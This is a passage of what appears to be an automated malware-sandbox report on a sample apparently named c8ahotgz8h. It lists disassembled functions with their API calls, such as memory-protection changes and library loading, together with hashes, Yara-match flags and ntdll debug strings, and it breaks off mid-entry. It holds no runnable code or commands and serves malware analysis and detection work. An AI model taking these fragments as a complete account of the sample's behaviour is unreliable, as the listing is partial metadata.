Opcode Fuzzy Hash: 5a26d430a2d090a820bf4f5314116ffd24961de1c209c8b2da92f1e55e77e4ed
Instruction Fuzzy Hash: 7811C5620187825ED725ED3445683E66FC65F62360F598B4ECCA59B8D2C63785438101

Uniqueness

Uniqueness Score: -1.00%

Function 005723E2, Relevance: 1.5, APIs: 1, Instructions: 43
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,005715C1,12BC0BD0,0056A728), ref: 005724F5

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction ID: 7bec9491bcebd8e26602e5db64857fecd65b64fe27260b38cb10d9b195377669
Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
Instruction Fuzzy Hash: 790171746043558FDF30CE68C8D87DA7695FB8D700F81412AAD4D5B305C6715E89CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2DC0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2DCA

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
Instruction ID: a00baf8296fbb468db3daf362860aa2f7f1454433f10f95d11190ab9ac975d69
Opcode Fuzzy Hash: 4339855833ae9a72e1ec4cd86917d8494a208997666b0cbc3e957413a2c91144
Instruction Fuzzy Hash: 1990027130150402D550B159450478A405947D0701FD1C519A9158D14EC6698DD57A65

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2D10, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2D1A

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
Instruction ID: bb6a4024f2017a34cfc1f4814ae16b068fc93babc8f020a9c9338f631b269f39
Opcode Fuzzy Hash: 4f56a682ad560840110673896e448377564de0e34f665648faa3ae3741ccd763
Instruction Fuzzy Hash: 0D90023130150413D521A159460474B405D47D0741FD1C91AA4518D18DD6668952B521

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2B90, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2B9A

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
Instruction ID: 4b742aeb5026e91c5a9a33e210505aa15ab5721915a6c4c57b21e789e4e78218
Opcode Fuzzy Hash: 62a89901bd5ef94a477ef41a0480d441addb9eac5abcc3e61ab8151bc2152d1e
Instruction Fuzzy Hash: A290023130158802D520A159850478E405947D0701FD5C919A8518E18DC6A588917521

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2B10, Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2B1A

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
Instruction ID: b1c29bfbe79d8c591d80c50f712eb090dd4a7910186f19a6a26d8553c4164bc6
Opcode Fuzzy Hash: 629af5c28d662c45297ec51d1e3899e15beac3e2919642994bc381a061601928
Instruction Fuzzy Hash: F990023130150802D590B159450468E405947D1701FD1C51DA4119E14DCA258A597BA1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F34E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1E8F34EA

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
Instruction ID: 3913ffb1fe9d8d599cac7747ae93cb5086c55f435a4f89ac06b1f09a5a83deed
Opcode Fuzzy Hash: b73b196f8d6b195a16686c31ff40ee3613791950e5312dbcce9f553fb39e7532
Instruction Fuzzy Hash: 3290023170560402D510A159461474A505947D0701FE1C919A4518D28DC7A5895179A2

Uniqueness

Uniqueness Score: -1.00%

Function 0056BF1C, Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction ID: 28afd958650d09b80608952a58c141fa42a07a02f2b2a8f8e81f643da00c4e30
Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
Instruction Fuzzy Hash: 8641773560531A9FCF309E285CE53DB2B61BFA53B0FA0072BDC56DB191DB318D458602

Uniqueness

Uniqueness Score: -1.00%

Function 0056BE04, Relevance: 1.6, APIs: 1, Instructions: 104
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction ID: 0327d574dbc4f0800ebe1b61ab5bdd207f1a4cf2d3da7fc7c8c06abba19ec839
Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
Instruction Fuzzy Hash: F4319B75A0035ADBDF302F245CA43EE2B6ABF947A0F61052FEC469B241D7318D808742

Uniqueness

Uniqueness Score: -1.00%

Function 0056C02C, Relevance: 1.6, APIs: 1, Instructions: 94
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction ID: 49f2a915e24d8e0c3b808ffb7c77f2a8db2218cc0f56602be14b26dd76b22581
Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
Instruction Fuzzy Hash: 26319B72A003099BCF30AE2958583DE2B77BFE43A0FBA8427EC49DB201C7318D468751

Uniqueness

Uniqueness Score: -1.00%

Function 0056F3EE, Relevance: 1.6, APIs: 1, Instructions: 57
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,?,?,4A82DAC6,005604DF,16EF18E8,0056E3FE,00000000,0056042E), ref: 0056F4E6

Memory Dump Source

Source File: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_560000_c8ahotgz8h.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction ID: 6c20cb82a3ff77e6cd48d1178652c92269bc3356b48ccfc60a8d6d5ff6766eed
Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
Instruction Fuzzy Hash: 55116B71A0132A9BCF306F2969A83CB2776BFD8790FA5442BEC4ADB201DB718D418751

Uniqueness

Uniqueness Score: -1.00%

Function 1E8F2B2A, Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 1E8F2B44

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
Instruction ID: 0526cdf0536bf8354c8339042182d7e75aed50185f2fbedb0ad8df34d479ccf0
Opcode Fuzzy Hash: f7826e858ca1f3195d9b112b58a1f64a87ef3b72ce635aaa4abc96c06aea18fd
Instruction Fuzzy Hash: 77B02B319014C1C5D600D720070870B790467C0B01F51C115D1020A00EC338C090F231

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1E95FDF4, Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95FE28

Strings

Invalid allocation size - %Ix (exceeded %Ix), xrefs: 1E96026A
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 1E96021F
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 1E960053
RtlReAllocateHeap, xrefs: 1E95FE3F, 1E95FEE2
HEAP[%wZ]: , xrefs: 1E95FF19, 1E960028, 1E960150, 1E9601F5, 1E96024C
HEAP: , xrefs: 1E95FF26, 1E960035, 1E96015D, 1E960202, 1E960259
Just reallocated block at %p to %Ix bytes, xrefs: 1E960171
About to reallocate block at %p to %Ix bytes, xrefs: 1E95FF3A

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
Instruction ID: 2c0afd6589bc538a8f1c5e1512e9740959f9036e46fc9fb43d9b47aa75b8d8d2
Opcode Fuzzy Hash: 0af8edec5393ccbb994a6fa1d6aafb7640d0cf89052f3e08e6b32a6d259a23f6
Instruction Fuzzy Hash: 4DD1F335504685DFCB22CFA8C490AADBBF6FF89310F048A5EE8459B752D735A981CF10

Uniqueness

Uniqueness Score: -1.00%

Function 1E8C0680, Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP[%wZ]: , xrefs: 1E914EBB
HEAP: , xrefs: 1E914ECA
(UCRBlock->Size >= *Size), xrefs: 1E914ED7

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
Instruction ID: 8ad0d6fb811714eca10da0fc7248ad4eace876b97c163c49f6ccbaad1d8db7a4
Opcode Fuzzy Hash: 88da66ffb26acf61d7442b21fff1a321b7c1c718d73947058aa74cdc301fd89e
Instruction Fuzzy Hash: 3CF1BE74A0064ADFDB05CF69C890BAAB7B6FF86740F14866DE4159B381D734E982CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E98ACEB, Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E98AEA9
RtlDebugPrintTimes.NTDLL ref: 1E98B185

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
Instruction ID: 22b94db48604072f8e2a00f7b2bff2ce94679b6ccc06c27598edd14712258bfe
Opcode Fuzzy Hash: 375523c332eeb3efdbe689127e94438d8dcd868dc67ca018378924086731b63e
Instruction Fuzzy Hash: 74F11672E006598FCB19CF68C8A0A7DBBF6AF8820071A476DD456DB394E774E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8CD690, Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E919299

Strings

GsHd, xrefs: 1E8CD794
RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 1E919372
RtlpFindActivationContextSection_CheckParameters, xrefs: 1E91914E, 1E919173
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919153
SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 1E919178
Actx , xrefs: 1E919315

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-2196497285
Opcode ID: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
Instruction ID: 8cb2b3911b704a202e9d2fdb0f0fb3e7eed4f5ca16d285c3a435b84e11cf4631
Opcode Fuzzy Hash: 39e568aa5e97859da72d087657729e9edb47046c33339f0de35c10a510ebb4dc
Instruction Fuzzy Hash: 78E18B706083468FD711DF19C890B9AB7E6FF89328F044B2DE9959B2C1D770E985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1E92FA02, Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E92FAF3
RtlDebugPrintTimes.NTDLL ref: 1E92FB15

Strings

LdrpRedirectDelayloadFailure, xrefs: 1E92FA5E
minkernel\ntdll\ldrdload.c, xrefs: 1E92FA68
Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx, xrefs: 1E92FA58
$, xrefs: 1E92FABD
Unknown, xrefs: 1E92FA42, 1E92FA54

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
API String ID: 3446177414-4227709934
Opcode ID: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
Instruction ID: 547ad52d1f5df5de6dd0bd51f64202b0da35348653418bbf5b0a0499c7004d3f
Opcode Fuzzy Hash: 418b33b8c2c6ec15cec2ae322837331767e369f2d8b8cc52f7a7139c3d7458c1
Instruction Fuzzy Hash: 88415E7590121AABCF02CF95C894AEEBBBABF88354F54022DE905B7344D7719941DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1E95F8F8, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95F92E

Strings

HEAP[%wZ]: , xrefs: 1E95F9EC, 1E95FAD7
HEAP: , xrefs: 1E95F9F9, 1E95FAE4
About to free block at %p with tag %ws, xrefs: 1E95FAFE
RtlFreeHeap, xrefs: 1E95F948, 1E95F9B2
About to free block at %p, xrefs: 1E95FA0A

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
API String ID: 3446177414-3492000579
Opcode ID: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
Instruction ID: aeaa8dcbf8dbce52ba6ce0f1a8adb7197c6c2d88cf2f96835c8eb15044b4c92e
Opcode Fuzzy Hash: f91e6a1a3a1764e5881a8a5dc3c69109d257b6fd832e1517975bf961d946279f
Instruction Fuzzy Hash: 7C71BE35904685EFCB02DFA8D8A0AADFBF6FF89220F04865EE4459B351D735A980CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DDA20, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E91F41B

Strings

, passed to %s, xrefs: 1E91F46C
HEAP[%wZ]: , xrefs: 1E91F444
Invalid heap signature for heap at %p, xrefs: 1E91F45D
HEAP: , xrefs: 1E91F451
RtlUnlockHeap, xrefs: 1E91F467

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-3224558752
Opcode ID: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
Instruction ID: ebe54a65b87e4b381568a7d8354f6c8a3860a487e46677da6f5bb182b6f66092
Opcode Fuzzy Hash: b10a4a09f937279abed18b2da23fff095e618d6ad8f6b53dae843c8896c4aad7
Instruction Fuzzy Hash: 31413635954789DFC722DF28C494B99B3A9FF40320F048B6DE8168B3C1C738A984CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1E95ECD7, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E95EDD0
RtlDebugPrintTimes.NTDLL ref: 1E95EE45

Strings

HEAP: , xrefs: 1E95ECDD
Entry Heap Size , xrefs: 1E95EDED
Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 1E95EDE3
---------------------------------------, xrefs: 1E95EDF9

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
API String ID: 3446177414-1102453626
Opcode ID: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
Instruction ID: c868dafd79be457cf34d8ee75ffd9967d4b38b90fae92619c0905e85f5acb4a6
Opcode Fuzzy Hash: 2c55faccb35043b79ec81085057293245eaa467a498317241b3f1f7b0adc4b37
Instruction Fuzzy Hash: 6841A035A10265DFC715CF19C484969BBEAFF86354725C66EE5059B311D732EC42CF80

Uniqueness

Uniqueness Score: -1.00%

Function 1E8DDAC0, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E91F561

Strings

, passed to %s, xrefs: 1E91F5B2
RtlLockHeap, xrefs: 1E91F5AD
HEAP[%wZ]: , xrefs: 1E91F58A
Invalid heap signature for heap at %p, xrefs: 1E91F5A3
HEAP: , xrefs: 1E91F597

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-1222099010
Opcode ID: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
Instruction ID: f19bd5dd62c6fc0db5f8b261023cc16b33072bd5ccbde0271516257a4cb5ed45
Opcode Fuzzy Hash: 86936b012511a38ad7d06f19cadea97447cc5cd2f91babb9721754840e30578c
Instruction Fuzzy Hash: 6D3100355147CCDFD722CF28C858FA97BA9FF01768F044B99E8028B791C779A988CA11

Uniqueness

Uniqueness Score: -1.00%

Function 1E8E4C3D, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 117timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8E4C84

Strings

LdrpFindDllActivationContext, xrefs: 1E923440, 1E92346C
minkernel\ntdll\ldrsnap.c, xrefs: 1E92344A, 1E923476
Querying the active activation context failed with status 0x%08lx, xrefs: 1E923466
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1E923439

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-3779518884
Opcode ID: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
Instruction ID: e00536071bbb5710b84bcc47732331ff08f497dee7669940f19939fee1637492
Opcode Fuzzy Hash: 9db3e8ac34cd91deae3a5aa1e180387fdb2a13e1e14ae253c850780dde7b558a
Instruction Fuzzy Hash: 3D314E72E00297AFDB12DB1C889AA59B2A5FF83354F42832AD90D57EC4D7709D80C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1E8AF8B0, Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E90E51F

Strings

HEAP[%wZ]: , xrefs: 1E90E490
HEAP: , xrefs: 1E90E49D
(HeapHandle != NULL), xrefs: 1E90E4A8

Memory Dump Source

Source File: 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, Offset: 1E880000, based on PE: true

Associated: 0000001D.00000002.51672927109.000000001E9A9000.00000040.00000001.sdmp Download File
Associated: 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_1e880000_c8ahotgz8h.jbxd

Similarity

API ID: DebugPrintTimes
String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3610490719
Opcode ID: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
Instruction ID: 307c4f4e8f421d2bf7b35f46c5c7d3b133776947de916ac59e53f4f42b6af5c4
Opcode Fuzzy Hash: 8e7dc8a89f7fe1fd8b01ed148f73f4ad947f9e72e5fd6f67020f0503b25cf44c
Instruction Fuzzy Hash: 1891E975604695AFC726CB29C850B6EB7AABFC4644F040B5DFA419B3C1DB34F881CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1E8D0AEB, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 210timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 1E8D0BFC

Strings

